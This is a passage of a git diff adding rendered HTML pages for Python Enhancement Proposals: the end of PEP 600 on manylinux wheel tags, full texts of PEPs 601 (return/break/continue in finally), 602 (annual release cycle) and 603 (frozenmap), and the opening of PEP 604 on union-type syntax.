And furthermore, the PEP process is poorly suited to maintaining this +kind of reference documentation – there’s a reason we don’t keep the +pip user manual in the PEPs repository! The auditwheel maintainers are +the best situated to understand what kinds of documentation are useful +to their users, and to maintain that documentation over time. For +example, there’s substantial overlap between the different manylinux +versions, and the PEP process currently forces us to handle this by +copy-pasting everything between a growing list of documents; instead, +the auditwheel maintainers might choose to factor out the common parts +into a single piece of shared documentation.

+

A related concern was that with the perennial approach, it may become +harder for package maintainers to decide which build profile to +target: instead of having to pick between manylinux1, +manylinux2010, manylinux2014, …, they now have a wider array +of options like manylinux_2_5, manylinux_2_6, …, +manylinux_2_20, … But again, we don’t believe this will be a +problem in practice. In either system, most package maintainers won’t +be starting by reading PEPs and trying to implement them from scratch. +If you’re a particularly expert and ambitious package maintainer who +needs to target a new version or new architecture, the perennial +approach gives you additional flexibility. But for regular everyday +maintainers, we expect they’ll start from a tutorial like +packaging.python.org, and by choosing from existing build images. A +tutorial can just as easily recommend manylinux_2_17 as it can +recommend manylinux2014, and we expect the actual set of +pre-provided build images to be identical in both cases. And again, by +maintaining this documentation in the right place, instead of trying +to do it PEPs repository, we expect that we’ll end up with +documentation that’s higher-quality and more fitted to purpose.

+

Finally, some participants have pointed out that it’s very nice to be +able to look at a wheel and tell definitively whether it meets the +requirements of the spec. With the new “perennial” approach, we can +never say with 100% certainty that a wheel does meet the spec, because +that depends on the Linux distros. As engineers we have a +well-justified dislike for that kind of uncertainty.

+

However: as demonstrated by the examples above, we can still tell +definitively when a wheel doesn’t meet the spec, which turns out to +be what’s important in practice. And, in practice, with the +manylinux20XX approach, whenever distros change, we actually change +the spec; it takes a bit longer. So even if a wheel was compliant +today, it might be become non-compliant tomorrow. This is frustrating, +but unfortunately this uncertainty is unavoidable if what you care +about is distributing working wheels to users.

+

So even on these points where the old approach initially seems to have +advantages, we expect the new approach to actually do as well or +better.

+

Switching to perennial tags, but continuing to write a PEP for each +version: This was proposed as a kind of hybrid, to try to get some +of the advantages of the perennial tagging system – like easier +rollouts of new versions – while keeping the advantages of the +manylinux20XX scheme, like forcing us to write documentation about +Linux distros, simplifying options for package maintainers, and being +able to definitively tell when a wheel meets the spec. But as +discussed above, on a closer look, it turns out that these advantages +are largely illusory. And this also inherits significant +disadvantages from the manylinux20XX scheme, like creating +indefinite obligations to update a growing list of copy-pasted PEPs.

+

Making auditwheel normative: Another possibility that was +considered was to make auditwheel the normative reference on the +definition of manylinux, i.e., a wheel would be compliant if and only +if auditwheel check completed without errors. This was rejected +because the point of packaging PEPs is to define interoperability +between tools, not to bless specific tools.

+

Adding extra words to the tag string: Another proposal we +considered was to add extra words to the wheel tag, e.g. +manylinux_glibc_2_17 instead of manylinux_2_17. The motivation +would be to leave the door open to other kinds of versioning +heuristics in the future – for example, we could have +manylinux_glibc_$VERSION and manylinux_alpine_$VERSION.

+

But “manylinux” has always been a synonym for “broad compatibility +with mainstream glibc-based distros”; reusing it for unrelated build +profiles like alpine is more confusing than helpful. Also, some early +reviewers who aren’t steeped in the details of packaging found the +word glibc actively misleading, jumping to the conclusion that it +meant they needed a system with exactly that glibc version. And tags +like manylinux_$VERSION and alpine_$VERSION also have the +advantages of parsimony and directness. So we’ll go with that.

+
+
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0600.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0601/index.html b/pep-0601/index.html new file mode 100644 index 00000000000..5aef9ae2b87 --- /dev/null +++ b/pep-0601/index.html @@ -0,0 +1,373 @@ + + + + + + + + PEP 601 – Forbid return/break/continue breaking out of finally | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 601 – Forbid return/break/continue breaking out of finally

+
+
Author:
+
Damien George, Batuhan Taskaya
+
Sponsor:
+
Alyssa Coghlan
+
Discussions-To:
+
Discourse thread
+
Status:
+
Rejected
+
Type:
+
Standards Track
+
Created:
+
26-Aug-2019
+
Python-Version:
+
3.8
+
Post-History:
+
26-Aug-2019, 23-Sep-2019
+
Superseded-By:
+
765
+
Resolution:
+
Discourse message
+
+
+
+
Table of Contents +
+
+

Rejection Note

+

This PEP was rejected by the Steering Council by a vote of 4/4.

+

Guido’s arguments for rejecting the PEP are: “it seems to me that most languages +implement this kind of construct but have style guides and/or linters that +reject it. I would support a proposal to add this to PEP 8”, and “I note that +the toy examples are somewhat misleading – the functionality that may be useful +is a conditional return (or break etc.) inside a finally block.”.

+
+
+

Abstract

+

This PEP proposes to forbid return, break and continue statements within +a finally suite where they would break out of the finally. Their use in +such a location silently cancels any active exception being raised through +the finally, leading to unclear code and possible bugs.

+

continue is currently not supported in a finally in Python 3.7 (due to +implementation issues) and the proposal is to not add support for it in +Python 3.8. For return and break the proposal is to deprecate their use +in Python 3.9, emit a compilation warning in Python 3.10 and then forbid +their use after that.

+
+
+

Motivation

+

The use of return, break and continue within a finally suite leads to behaviour +which is not at all obvious. Consider the following function:

+
def foo():
+    try:
+        foo()
+    finally:
+        return
+
+
+

This will return cleanly (without an exception) even though it has infinite +recursion and raises an exception within the try. The reason is that the return +within the finally will silently cancel any exception that propagates through +the finally suite. Such behaviour is unexpected and not at all obvious. +This function is equivalent to:

+
def foo():
+    try:
+        foo()
+    except:
+        pass
+    return
+
+
+

break and continue have similar behaviour (they silence exceptions) if they +jump to code outside the finally suite. For example:

+
def bar():
+    while True:
+        try:
+            1 / 0
+        finally:
+            break
+
+
+

This behaviour goes against the following parts of The Zen of Python:

+
    +
  • Explicit is better than implicit - exceptions are implicitly silenced
  • +
  • Readability counts - the intention of the code is not obvious
  • +
  • Errors should never pass silently; Unless explicitly silenced - exceptions +are implicitly silenced
  • +
+

If this behaviour of silencing exceptions is really needed then the explicit +form of a try-except can be used instead, and this makes the code clearer.

+

Independent to the semantics, implementing return/break/continue within a +finally suite is non-trivial as it requires to correctly track any active +exceptions at runtime (an executing finally suite may or may not have an +active exception) and cancel them as appropriate. CPython did have a bug in +this for the case of continue and so originally disallowed it [1]. Requiring +correct behaviour for return/break/continue within a finally puts an +unnecessary burden on alternative implementations of Python.

+
+
+

Other languages

+

Java allows to return from within a finally block, but its use is discouraged +according to [2], [3], [4]. The Java compiler later on included a linting +option -Xlint:finally to warn against the use of return within a finally block. +The Eclipse editor also warns about this use.

+

Ruby allows return from inside ensure (Python’s finally), but it should be an +explicit return. It is discouraged and handled by linters [5], [6].

+

Like Ruby, JavaScript also allows use of return/break/continue within a finally +but it is seen as unsafe and it is handled by eslint [7].

+

C# forbids the use of ending statements like return/goto/break within a finally +[8], [9].

+
+
+

Rationale

+

Since the behaviour of return/break/continue within a finally is unclear, the +pattern is rarely used, and there is a simple alternative to writing equivalent +code (which is more explicit), forbidding the syntax is the most straightforward +approach.

+
+
+

Specification

+

This is a change to the compiler, not the grammar. The compiler should +check for the following in a finally suite:

+
    +
  • A return in any statement, at any level of nesting.
  • +
  • A break/continue in any statement, at any level of nesting, that would +transfer control flow outside the finally suite.
  • +
+

Upon finding such a case it should emit the appropriate exception:

+
    +
  • For continue, a SyntaxError (this is the current behaviour of 3.7).
  • +
  • For return/break, a SyntaxWarning in 3.10, and a SyntaxError after that.
  • +
+

For example, the following are all forbidden by this proposal:

+
def f():
+    try:
+        pass
+    finally:
+        return
+
+def g():
+    try:
+        pass
+    finally:
+        try:
+            return
+        finally:
+            pass
+
+def h():
+    try:
+        pass
+    finally:
+        try:
+            pass
+        finally:
+            for x in range(10):
+                return
+
+
+

The following is still allowed because the continue doesn’t escape the +finally:

+
try:
+    pass
+finally:
+    for x in range(10):
+        continue
+
+
+

Note that yielding from within a finally remains acceptable by this PEP +because resuming the generator will resume the finally and eventually +raise any active exceptions (so they are never silenced by yielding).

+
+
+

Backwards Compatibility

+

This is a backwards incompatible change, for return and break.

+

The following locations in the CPython standard library (at +v3.8.0b1-651-g7fcc2088a5) use return within finally:

+
    +
  • Lib/subprocess.py:921 - the use here looks like a bug
  • +
  • Lib/multiprocessing/connection.py:316 - the use here looks legitimate +but the intention is not clear
  • +
  • Lib/multiprocessing/connection.py:318 - the use here looks legitimate +but the intention is not clear
  • +
  • Lib/test/test_sys_settrace.py:837 - a test for return within finally
  • +
  • Lib/test/test_sys_settrace.py:1346 - a test for return within finally
  • +
+

There are no uses of break within a finally (that break out of the finally) +in the standard library.

+
+
+

Security Implications

+

This is a simplification of the language, and removal of associated code, +so should not introduce any new paths for a security exploit.

+
+
+

How to Teach This

+

This feature is very rarely used so forbidding it will likely only impact +advanced users, not beginners and probably not any existing teaching +material. Since this is the removal of a feature teaching users will be +one by the raising of a SyntaxError if/when the forbidden feature is used.

+
+
+

Reference Implementation

+

There is currently no reference implementation, although the way continue +is currently handled in a finally (raising a SyntaxError) can be extended +to return and break.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0601.rst

+

Last modified: 2024-11-20 11:56:53 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0602/index.html b/pep-0602/index.html new file mode 100644 index 00000000000..4522d11f53e --- /dev/null +++ b/pep-0602/index.html @@ -0,0 +1,479 @@ + + + + + + + + PEP 602 – Annual Release Cycle for Python | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 602 – Annual Release Cycle for Python

+
+
Author:
+
Łukasz Langa <lukasz at python.org>
+
PEP-Delegate:
+
Brett Cannon <brett at python.org>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Active
+
Type:
+
Process
+
Created:
+
04-Jun-2019
+
Python-Version:
+
3.9
+
Post-History:
+
09-Oct-2023
+
Resolution:
+
Python-Dev thread
+
+
+
+
Table of Contents +
+
+

Abstract

+

This document describes a change in the release calendar for Python +starting with Python 3.9. This change accelerates the release cadence +such that feature versions are released predictably every twelve months, +in October every year.

+
+
+

Implementation

+
+

Seventeen months to develop a feature version

+

This PEP proposes that Python 3.X.0 will be developed for around +17 months:

+
    +
  • The first five months overlap with Python 3.(X-1).0’s beta +and release candidate stages and are thus unversioned.
  • +
  • The next seven months are spent on versioned alpha releases where +both new features are incrementally added and bug fixes are included.
  • +
  • The following three months are spent on four versioned beta releases +where no new features can be added but bug fixes are still +included.
  • +
  • The final two months are spent on two release candidates (or more, +if necessary) and conclude with the release of the final release of +Python 3.X.0.
  • +
+
+
+

2 years of full support, 3 more years of security fixes

+

After the release of Python 3.X.0, the 3.X series is maintained for +five years:

+
    +
  • During the first twenty four months (2 years) it receives bugfix +updates and full releases (sources and installers for Windows and +macOS) are made approximately every other month.
  • +
  • For the next thirty six months (3 years) it receives security +updates and source-only releases are made on an as-needed basis +(no fixed cadence).
  • +
  • The final source-only release is made five years after 3.X.0.
  • +
+

Note: 2 years of full support start with +Python 3.13. Python versions +3.9 - 3.12 operate on a calendar with 1½ year of full support, followed +by 3½ more years of security fixes.

+
+
+

Annual release cadence

+

Feature development of Python 3.(X+1).0 starts as soon as +Python 3.X.0 Beta 1 is released. This creates a twelve-month delta +between Python feature versions.

+
+
+
+

Example

+
    +
  • 3.9 development begins: Tuesday, 2019-06-04
  • +
  • 3.9.0 alpha 1: Monday, 2019-10-14
  • +
  • 3.9.0 alpha 2: Monday, 2019-11-18
  • +
  • 3.9.0 alpha 3: Monday, 2019-12-16
  • +
  • 3.9.0 alpha 4: Monday, 2020-01-13
  • +
  • 3.9.0 alpha 5: Monday, 2020-02-17
  • +
  • 3.9.0 alpha 6: Monday, 2020-03-16
  • +
  • 3.9.0 alpha 7: Monday, 2020-04-13
  • +
  • 3.9.0 beta 1: Monday, 2020-05-18 +(No new features beyond this point.)
  • +
  • 3.9.0 beta 2: Monday, 2020-06-08
  • +
  • 3.9.0 beta 3: Monday, 2020-06-29
  • +
  • 3.9.0 beta 4: Monday, 2020-07-20
  • +
  • 3.9.0 candidate 1: Monday, 2020-08-10
  • +
  • 3.9.0 candidate 2: Monday, 2020-09-14
  • +
  • 3.9.0 final: Monday, 2020-10-05
  • +
+
+../_images/pep-0602-example-release-calendar.png + +
+

Figure 1. Consequences of the annual release cycle on the calendar.

+
+
+

In comparison, if this PEP is rejected and Python keeps the current +release schedule:

+
    +
  • 3.9 development begins: Tuesday, 2019-06-04
  • +
  • 3.9.0 alpha 1: Monday, 2020-08-03 (10 months later)
  • +
  • 3.9.0 alpha 2: Monday, 2020-09-07
  • +
  • 3.9.0 alpha 3: Monday, 2020-10-05
  • +
  • 3.9.0 alpha 4: Monday, 2020-11-02
  • +
  • 3.9.0 beta 1: Monday, 2020-11-30 (6 months later)
  • +
  • 3.9.0 beta 2: Monday, 2021-01-04
  • +
  • 3.9.0 beta 3: Monday, 2021-02-01
  • +
  • 3.9.0 beta 4: Monday, 2021-03-01
  • +
  • 3.9.0 candidate 1: Monday, 2021-03-29
  • +
  • 3.9.0 candidate 2: Monday, 2021-04-05 (if necessary)
  • +
  • 3.9.0 final: Monday, 2021-04-19 (6 months later)
  • +
+
+
+

Dependent Policies

+
+

Deprecations

+

The current policy around breaking changes assumes at least two releases +before a deprecated feature is removed from Python or a __future__ +behavior is enabled by default. This is documented in PEP 387.

+

This PEP proposes to keep this policy of at least two releases +before making a breaking change.

+
+
+

The term of the Steering Council

+

The current wording of PEP 13 states that “a new council is elected +after each feature release”. This PEP proposes to keep this policy +as it will lead to a consistent election schedule.

+
+
+

The term of the Release Manager

+

The current undocumented convention is for a single Release Manager to +handle two feature releases of Python. This PEP proposes to keep this +policy, allowing for the term to be extended to more releases with +approval from the Steering Council and the Cabal of Release Managers.

+

In particular, since this PEP is authored by the active Release Manager +and its effect would shorten the term of the Release Manager, the author +is open to managing the release of a third feature release to compensate +for the disruption.

+
+
+
+

Rationale and Goals

+

This change provides the following advantages:

+
    +
  • makes releases smaller: since doubling the cadence doesn’t double our +available development resources, consecutive releases are going to be +smaller in terms of features;
  • +
  • puts features and bug fixes in hands of users sooner;
  • +
  • creates a more gradual upgrade path for users, by decreasing the +surface of change in any single release;
  • +
  • creates a predictable calendar for releases where the final release is +always in October (so after the annual core sprint), and the beta +phase starts in late May (so after PyCon US sprints), which is +especially important for core developers who need to plan to include +Python involvement in their calendar;
  • +
  • decreases the urge to rush features shortly before “Beta 1” due to +the risk of them “slipping for 18 months”;
  • +
  • allows for synchronizing the schedule of Python release management +with external distributors like Fedora who’ve been historically very +helpful in finding regressions early not only in core Python but also +in third-party libraries, helping moving the community forward to +support the latest version of Python from Day 1;
  • +
  • increases the explicit alpha release phase, which provides meaningful +snapshots of progress on new features;
  • +
  • significantly cuts the implicit “alpha 0” release phase which provides +limited use for new development anyway (it overlaps with the beta of +the currently developed, still unreleased, version).
  • +
+
+

Non-goals

+

Adopting an annual release calendar allows for natural switching to +calendar versioning, for example by calling Python 3.9 “Python 3.20” +since it’s released in October ‘20 and so on (“Python 3.23” would be the +one released in October ‘23).

+

While the ease of switching to calendar versioning can be treated as +an advantage of an annual release cycle, this PEP does not advocate for +or against a change in how Python is versioned. Should the annual +release cycle be adopted, the versioning question will be dealt with in +a separate PEP.

+
+
+

Non-risks

+

This change does not shorten the currently documented support calendar +for a Python release, both in terms of bugfix releases and security +fixes.

+

This change does not accelerate the velocity of development. Python is +not going to become incompatible faster or accrue new features faster. +It’s just that features are going to be released more gradually as they +are developed.

+

Consequently, while this change introduces the ability for users to +upgrade much faster, it does not require them to do so. Say, if they +upgrade every second release, their experience with Python is going to +be similar to the current situation.

+
+
+

Risks

+
+

Python redistribution

+

This requires changes to how integrators, like Linux distributions, +release Python within their systems.

+
+
+

The testing matrix

+

This eventually increases the testing matrix for library and application +maintainers that want to support all actively supported Python versions +by one or two:

+
+../_images/pep-0602-overlapping-support-matrix.png + +
+

Figure 2. Testing matrix in the 18-month cadence vs. the 12-month

+
+
+

The “extended bugfix support at the discretion of the Release Manager” +stage of the current release cycle is not codified. If fact, PEP 101 +currently states that after the release of Python 3.(X+1).0 only one +last bugfix release is made for Python 3.X.0. However, in practice at +least the last four versions of Python 3 overlapped with stable releases +of the next version for around six months. Figure 2 is including +this information to demonstrate that overlap between stable version +releases with the 12-month release cadence will be nothing new.

+
+
+

Other policies may depend on the release cadence

+

Although identified dependent policies were addressed in a previous +section, it is entirely possible there are some other areas which +implicitly rely on the timing of Python releases.

+
+
+
+

Rejected Ideas

+
+

Keep the current 18 month release cadence

+

This is undesirable both for core developers and end users. From the +perspective of the core developer:

+
    +
  • it makes contribution scheduling harder due to irregular release +dates every year;
  • +
  • it creates a surge of rushed commits before (and even after!) Beta 1 +due to the stress involved with “missing a release”;
  • +
  • ironically, after Beta 1 it creates a false sense of having “plenty of +time” before the next release, time that passes quickly regardless;
  • +
  • it causes certain elements of the workflow to be executed so rarely +that they are not explicitly documented, let alone automated.
  • +
+

More importantly, from the perspective of the user:

+
    +
  • it creates releases with many new features, some being explicitly +incompatible and some being accidentally incompatible, which makes +the upgrade cost relatively high every time;
  • +
  • it sits on features and incompatible bug fixes for over a year before +becoming available to the user; and more specifically
  • +
  • it causes every “point zero” release to be extra risky for users. +While we provide and recommend testing with alphas and betas, +“point zero” is the first release of a given Python version for many +users. The bigger a release is feature-wise, the more potential +problems are hiding in “point zero releases”.
  • +
+
+
+

Double the release cadence to achieve 9 months between feature versions

+

This was originally proposed in PEP 596 and rejected as both too +irregular and too short. This would not give any of the benefits of +a regular release calendar but it would shorten all development phases, +especially the beta + RC phases. This was considered dangerous.

+
+
+

Keep “4 betas over 4 months and a final month for the release candidate”

+

While this would make the release calendar a bit cleaner, it would make +it very hard for external distributors like Fedora +to release the newest version of Python as soon as possible. We are +adjusting Python’s calendar here in the hope that this will enable +Fedora to integrate the newest version of Python with the newest version +of Fedora as both are being developed which makes both projects +better.

+
+
+

Slow down releases but don’t freeze feature development with Beta 1

+

This is described in PEP 598. This proposal includes non-standard +concepts like the “incremental feature release” which makes it hard +to understand. The presented advantages are unclear while the +unfamiliarity of the scheme poses a real risk of user and integrator +confusion.

+
+
+

Long-Term Support Releases

+

Each version of Python is effectively long-term support: it’s supported +for five years, with the first eighteen months allowing regular bug +fixes and security updates. For the remaining time security updates are +accepted and promptly released.

+

No extended support in the vein of Python 2.7 is planned going forward.

+
+
+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0602.rst

+

Last modified: 2024-05-28 05:47:01 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0603/index.html b/pep-0603/index.html new file mode 100644 index 00000000000..b89a3ad5236 --- /dev/null +++ b/pep-0603/index.html @@ -0,0 +1,537 @@ + + + + + + + + PEP 603 – Adding a frozenmap type to collections | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 603 – Adding a frozenmap type to collections

+
+
Author:
+
Yury Selivanov <yury at edgedb.com>
+
Discussions-To:
+
Discourse thread
+
Status:
+
Draft
+
Type:
+
Standards Track
+
Created:
+
12-Sep-2019
+
Post-History:
+
12-Sep-2019
+
+
+
+
Table of Contents +
+
+

Abstract

+

A persistent data structure is defined as a data structure that +preserves the previous version of the data when the data is modified. +Such data structures are effectively immutable, as operations on +them do not update the structure in-place, but instead always yield +a new updated structure (see [0] for more details.)

+

This PEP proposes to add a new fully persistent and immutable mapping +type called frozenmap to the collections module.

+

The bulk of frozenmap’s reference implementation is already +used in CPython to implement the contextvars module.

+
+
+

Rationale

+

Python has two immutable collection types: tuple and +frozenset. These types can be used to represent immutable lists +and sets. However, a way to represent immutable mappings does not yet +exist, and this PEP proposes a frozenmap to implement an +immutable mapping.

+

The proposed frozenmap type:

+
    +
  • implements the collections.abc.Mapping protocol,
  • +
  • supports pickling, and
  • +
  • provides an API for efficient creation of “modified” versions.
  • +
+

The following use cases illustrate why an immutable mapping is +desirable:

+
    +
  • Immutable mappings are hashable which allows their use +as dictionary keys or set elements.

    This hashable property permits functions decorated with +@functools.lru_cache() to accept immutable mappings as +arguments. Unlike an immutable mapping, passing a plain dict +to such a function results in error.

    +
  • +
  • Immutable mappings can hold complex state. Since immutable mappings +can be copied by reference, transactional mutation of state can be +efficiently implemented.
  • +
  • Immutable mappings can be used to safely share dictionaries across +thread and asynchronous task boundaries. The immutability makes it +easier to reason about threads and asynchronous tasks.
  • +
+

Lastly, CPython [1] already contains the main portion of the C code +required for the frozenmap implementation. The C code already +exists to implement the contextvars module (see PEP 567 for +more details.) Exposing this C code via a public collection type +drastically increases the number of users of the code. This leads to +increased code quality by discovering bugs and improving performance +which without a frozenmap collection would be very challenging +because most programs use the contextvars module indirectly.

+
+
+

Specification

+

A new public immutable type frozenmap is added to the +collections module.

+
+

Construction

+

frozenmap implements a dict-like construction API:

+
    +
  • frozenmap() creates a new empty immutable mapping;
  • +
  • frozenmap(**kwargs) creates a mapping from **kwargs, e.g. +frozenmap(x=10, y=0, z=-1)
  • +
  • frozenmap(collection) creates a mapping from the passed +collection object. The passed collection object can be:
      +
    • a dict,
    • +
    • another frozenmap,
    • +
    • an object with an items() method that is expected to return +a series of key/value tuples, or
    • +
    • an iterable of key/value tuples.
    • +
    +
  • +
+
+
+

Data Access

+

frozenmap implements the collection.abc.Mapping protocol. +Therefore, getters, membership checks, and iteration work the same +way that they would for a dict:

+
m = frozenmap(foo='bar')
+
+assert m['foo'] == 'bar'
+assert m.get('foo') == 'bar'
+assert 'foo' in m
+
+assert 'baz' not in m
+assert m.get('baz', 'missing') == 'missing'
+
+assert m == m
+assert m != frozenmap()  # m is not equal to an empty frozenmap
+
+assert len(m) == 1
+
+# etc.
+
+
+
+
+

Mutation

+

frozenmap instances are immutable. That said, it is possible +to efficiently produce mutated copies of the immutable instance.

+

The complexity of mutation operations is O(log N) and the resulting +frozenmap copies often consume very little additional memory due +to the use of structural sharing (read [6] for more details.)

+
+

frozenmap.including(key, value)

+

The method creates a new frozenmap copy with a new key / value +pair:

+
m = frozenmap(foo=1)
+m2 = m.including('bar', 100)
+
+print(m)   # will print frozenmap({'foo': 1})
+print(m2)  # will print frozenmap({'foo': 1, 'bar': 100})
+
+
+
+
+

frozenmap.excluding(key)

+

The method produces a copy of the frozenmap which does not +include a deleted key:

+
m = frozenmap(foo=1, bar=100)
+
+m2 = m.excluding('foo')
+
+print(m)   # will print frozenmap({'foo': 1, 'bar': 100})
+print(m2)  # will print frozenmap({'bar': 1})
+
+m3 = m.excluding('spam')  # will throw a KeyError('spam')
+
+
+
+
+

frozenmap.union(mapping=None, **kw)

+

The method produces a copy of the frozenmap and adds or modifies +multiple key/values for the created copy. The signature of +the method matches the signature of the frozenmap constructor:

+
m = frozenmap(foo=1)
+
+m2 = m.union({'spam': 'ham'})
+print(m2)  # will print frozenmap({'foo': 1, 'spam': 'ham'})
+
+m3 = m.union(foo=100, y=2)
+print(m3)  # will print frozenmap({'foo': 100, 'y': 2})
+
+print(m)   # will print frozenmap({'foo': 1})
+
+
+

Calling the union() method to add/replace N keys is more efficient +than calling the including() method N times.

+
+
+

frozenmap.mutating()

+

The method allows efficient copying of a frozenmap instance with +multiple modifications applied. This method is especially useful +when the frozenmap in question contains thousands of key/value pairs +and there’s a need to update many of them in a performance-critical +section of the code.

+

The frozenmap.mutating() method returns a mutable dict-like +copy of the frozenmap object: an instance of +collections.FrozenMapCopy.

+

The FrozenMapCopy objects:

+
    +
  • are copy-on-write views of the data of frozenmap instances +they were created from;
  • +
  • are mutable, although any mutations on them do not affect the +frozenmap instances they were created from;
  • +
  • can be passed to the frozenmap constructor; creating a +frozenmap from a FrozenMapCopy object is an O(1) +operation;
  • +
  • have O(log N) complexity for get/set operations; creating +them is an O(1) operation;
  • +
  • have a FrozenMapCopy.close() method that prevents any +further access/mutation of the data;
  • +
  • can be used as a context manager.
  • +
+

The below example illustrates how mutating() can be used with +a context manager:

+
numbers = frozenmap((i, i ** 2) for i in range(1_000_000))
+
+with numbers.mutating() as copy:
+    for i in numbers:
+        if not (numbers[i] % 997):
+            del copy[i]
+
+    numbers_without_997_multiples = frozenmap(copy)
+
+    # at this point, *numbers* still has 1_000_000 key/values, and
+    # *numbers_without_997_multiples* is a copy of *numbers* without
+    # values that are multiples of 997.
+
+    for i in numbers:
+        if not (numbers[i] % 593):
+            del copy[i]
+
+    numbers_without_593_multiples = frozenmap(copy)
+
+    print(copy[10])  # will print 100.
+
+print(copy[10])  # This will throw a ValueError as *copy*
+                 # has been closed when the "with" block
+                 # was executed.
+
+
+
+
+
+

Iteration

+

As frozenmap implements the standard collections.abc.Mapping +protocol, so all expected methods of iteration are supported:

+
assert list(m) == ['foo']
+assert list(m.items()) == [('foo', 'bar')]
+assert list(m.keys()) == ['foo']
+assert list(m.values()) == ['bar']
+
+
+

Iteration in frozenmap, unlike in dict, does not preserve the +insertion order.

+
+
+

Hashing

+

frozenmap instances can be hashable just like tuple objects:

+
hash(frozenmap(foo='bar'))  # works
+hash(frozenmap(foo=[]))     # will throw an error
+
+
+
+
+

Typing

+

It is possible to use the standard typing notation for frozenmaps:

+
m: frozenmap[str, int] = frozenmap()
+
+
+
+
+
+

Implementation

+

The proposed frozenmap immutable type uses a Hash Array Mapped +Trie (HAMT) data structure. Functional programming languages, +like Clojure, use HAMT to efficiently implement immutable hash tables, +vectors, and sets.

+
+

HAMT

+

The key design contract of HAMT is the guarantee of a predictable +value when given the hash of a key. For a pair of key and value, +the hash of the key can be used to determine the location of +value in the hash map tree.

+

Immutable mappings implemented with HAMT have O(log N) performance +for set() and get() operations. This efficiency is possible +because mutation operations only affect one branch of the tree, +making it possible to reuse non-mutated branches, and, therefore, +avoiding copying of unmodified data.

+

Read more about HAMT in [5]. The CPython implementation [1] has a +fairly detailed description of the algorithm as well.

+
+
+

Performance

+
+../_images/pep-0603-hamt_vs_dict.png + +
+

Figure 1. Benchmark code can be found here: [3].

+
+
+

The above chart demonstrates that:

+
    +
  • frozenmap implemented with HAMT displays near O(1) performance +for all benchmarked dictionary sizes.
  • +
  • dict.copy() becomes less efficient when using around +100-200 items.
  • +
+
+../_images/pep-0603-lookup_hamt.png + +
+

Figure 2. Benchmark code can be found here: [4].

+
+
+

Figure 2 compares the lookup costs of dict versus a HAMT-based +immutable mapping. HAMT lookup time is ~30% slower than Python dict +lookups on average. This performance difference exists since traversing +a shallow tree is less efficient than lookup in a flat continuous array.

+

Further to that, quoting [6]: “[using HAMT] means that in practice +while insertions, deletions, and lookups into a persistent hash array +mapped trie have a computational complexity of O(log n), for most +applications they are effectively constant time, as it would require +an extremely large number of entries to make any operation take more +than a dozen steps.”

+
+
+
+

Design Considerations

+
+

Why “frozenmap” and not “FrozenMap”

+

The lower-case “frozenmap” resonates well with the frozenset +built-in as well as with types like collections.defaultdict.

+
+
+

Why “frozenmap” and not “frozendict”

+

“Dict” has a very specific meaning in Python:

+
    +
  • a dict is a concrete implementation of abc.MutableMapping with +O(1) get and set operations (frozenmap has O(log N) complexity);
  • +
  • Python dicts preserve insertion order.
  • +
+

The proposed frozenmap does not have these mentioned +properties. Instead, frozenmap has an O(log N) cost of set/get +operations, and it only implements the abc.Mapping protocol.

+
+
+
+

Implementation

+

The full implementation of the proposed frozenmap type is +available at [2]. The package includes C and pure Python +implementations of the type.

+

See also the HAMT collection implementation as part of the +CPython project tree here: [1].

+
+
+

References

+ +
+
+

Acknowledgments

+

I thank Carol Willing, Łukasz Langa, Larry Hastings, and +Guido van Rossum for their feedback, ideas, edits, and discussions +around this PEP.

+
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-0603.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-0604/index.html b/pep-0604/index.html new file mode 100644 index 00000000000..a0474a70d09 --- /dev/null +++ b/pep-0604/index.html @@ -0,0 +1,385 @@ + + + + + + + + PEP 604 – Allow writing union types as X | Y | peps.python.org + + + + + + + + + + + + + + + + + + + + + + + + Following system colour scheme + + + + + + + Selected dark colour scheme + + + + + + + Selected light colour scheme + + + + + + + + + + + + + + +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 604 – Allow writing union types as X | Y

+
+
Author:
+
Philippe PRADOS <python at prados.fr>, Maggie Moss <maggiebmoss at gmail.com>
+
Sponsor:
+
Chris Angelico <rosuav at gmail.com>
+
BDFL-Delegate:
+
Guido van Rossum <guido at python.org>
+
Discussions-To:
+
Typing-SIG list
+
Status:
+
Final
+
Type:
+
Standards Track
+
Topic:
+
Typing
+
Created:
+
28-Aug-2019
+
Python-Version:
+
3.10
+
Post-History:
+
28-Aug-2019, 05-Aug-2020
+
+
+
+
Table of Contents +
+
+

Important

+

This PEP is a historical document. The up-to-date, canonical documentation can now be found at Union Type.

+

×

+

See PEP 1 for how to propose changes.

+
+
+

Abstract

+

This PEP proposes overloading the | operator on types to allow +writing Union[X, Y] as X | Y, and allows it to appear in +isinstance and issubclass calls.

+
+
+

Motivation

+

PEP 484 and PEP 526 propose a generic syntax to add typing to variables, +parameters and function returns. PEP 585 proposes to expose +parameters to generics at runtime. +Mypy [1] accepts a syntax which looks like:

+
annotation: name_type
+name_type: NAME (args)?
+args: '[' paramslist ']'
+paramslist: annotation (',' annotation)* [',']
+
+
+
    +
  • To describe a disjunction (union type), the user must use Union[X, Y].
  • +
+

The verbosity of this syntax does not help with type adoption.

+
+
+

Proposal

+

